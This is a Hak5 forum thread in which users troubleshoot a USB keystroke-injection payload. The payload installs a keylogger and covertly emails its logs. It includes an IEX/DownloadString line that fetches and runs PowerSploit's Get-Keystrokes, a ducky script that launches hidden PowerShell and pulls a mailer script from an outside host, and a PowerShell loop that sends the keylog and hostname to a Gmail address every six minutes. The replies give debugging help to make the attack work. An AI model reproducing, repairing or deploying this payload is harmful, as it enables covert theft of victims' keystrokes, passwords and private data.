Jump to content
Hak5 Forums

Recommended Posts

Posted (edited)

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script maybe this and the correction that may need to happen.

while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Edited by PoSHMagiC0de
forgot extra parenthesis.

Share this post


Link to post
Share on other sites

Hey my Problem is that Things like //:https are written in powershell like ähttpsÖ

any ideas how to fix this?

Share this post


Link to post
Share on other sites
On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script maybe this and the correction that may need to happen.


while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

 Hey thank for reply , y try to modify the mail.ps1 with


while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

i'm still getting the same issue .. empty emails. I can't solve this probleme ?

Share this post


Link to post
Share on other sites

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location.  Where ever $env:temp points to.  If you type that out in powershell it will tell you.  Look for the key.txt while just running the keylogger.  If a file shows up and holds data then something is up with the emailer.  if you get no key.txt or no stuff in it then the keylogger is not logging.

Share this post


Link to post
Share on other sites
31 minutes ago, PoSHMagiC0de said:

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location.  Where ever $env:temp points to.  If you type that out in powershell it will tell you.  Look for the key.txt while just running the keylogger.  If a file shows up and holds data then something is up with the emailer.  if you get no key.txt or no stuff in it then the keylogger is not logging.

Nop , i ad a look on %temp% et there is no log.txt created

tryed both script , same issue . Getting empty mails


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1

Share this post


Link to post
Share on other sites

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

The default if ran on its own with no parameters it should create a key.log. in the temp folder.  The line below in the payload.txt changes that to key.txt if ran with it.

STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

<ight want to check your AV too.  The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.  

Share this post


Link to post
Share on other sites
Posted (edited)
19 minutes ago, PoSHMagiC0de said:

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

The default if ran on its own with no parameters it should create a key.log. in the temp folder.  The line below in the payload.txt changes that to key.txt if ran with it.


STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.


IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

<ight want to check your AV too.  The keylogger comes from Powersploit which is known by the AV authors so it might be getting blocked.  


Thank's , so if a got it right tue script should look like this . I'm going to try in a sec

 

So if a followed you right tu script should look like this

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
ENTER

 

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxx@gmail.com'
$ReportEmail.To.Add('xxxx@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

Edited by mrskannk

Share this post


Link to post
Share on other sites

Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer.  Ignore it for now.  What you are going to have to do is verify the payload works without the RD or BB.  If it doesn't work without it on your test machine then it definitely will not work being launched from the device.

So, above I was trying to have you just jump on your test machine.  Run powershell and just use the two line commands I put out.

The first will download and launch get-keystokes function to memory for use.  Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be.  I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes.  If you get nothing, something is wrong but atleast you may get an error message if it does.  If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email.  So, ignore the RD for now until you know the scripts work.

 

Now if it does then try and run the payload by hand.  That means playing out by hand what the payload does to see if everything works.  

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×